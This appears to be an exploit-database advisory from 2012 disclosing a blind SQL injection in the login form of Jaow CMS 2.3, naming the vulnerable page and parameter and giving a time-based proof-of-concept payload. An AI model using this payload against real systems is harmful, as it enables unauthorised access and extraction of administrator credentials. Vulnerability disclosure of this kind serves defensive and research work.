Jaow CMS 2.3 - Blind SQL Injection
| EKU-ID: 26146 | CVE: OSVDB-85464 | OSVDB-ID: |
| Author: loneferret | Published: 2012-08-17 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 26146 | CVE: OSVDB-85464 | OSVDB-ID: |
| Author: loneferret | Published: 2012-08-17 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Author: loneferret of Offensive Security # Product: Jaow CMS # Version: v2.3 # Vendor Site: http://www.jaow.net # Software Download: http://www.jaow.net # Description: Small free CMS application, no programming experienced needed to install # and administer. # Vulnerability: # Blind-SQL in login form. # Page: /connexion.php # Parameter: login # PoC: x' or (sleep(10)+1) limit 1 -- # With a little time, I'm sure someone could come up with a script to get the admin's # hash out of MySql.